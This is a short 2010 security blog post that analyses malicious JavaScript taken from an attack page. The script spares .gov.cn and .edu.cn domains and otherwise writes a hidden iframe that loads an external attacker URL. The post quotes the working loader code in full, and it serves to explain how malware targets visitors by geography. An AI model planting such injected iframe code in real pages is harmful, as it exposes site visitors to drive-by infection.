marco

blog

Menu:

• home
• publications
• projects
• blog

Geographical targeting of attacks

December 15, 2010

Attackers have often targeted specific geographical regions, or, conversely, spared certain regions from their attacks. A recent example is the following JavaScript found on a malicious web page:

var s, siteUrl, tmpdomain;
var arydomain = new Array(".gov.cn",".edu.cn");
s = document.location + "";
siteUrl=s.substring(7, s.indexOf('/',7));
tmpdomain = 0;
for(var i = 0; i < arydomain.length; i++) {
    if(siteUrl.indexOf(arydomain[i]) > -1){
        tmpdomain = 1;
        break;
    }
}
if(tmpdomain == 0) {
    document.writeln("<iframe src=http://ggggasz.8866.org:8843/GwN2/index.html?1 width=100 height=0></iframe>");
}

The code checks the location of the current document. If the domain does not contain the strings .gov.cn or .edu.cn, then the attack is launched (by dynamically creating an iframe tag), otherwise the script performs no action.

Certainly not new, but still interesting...

Posted by marco in malware, javascript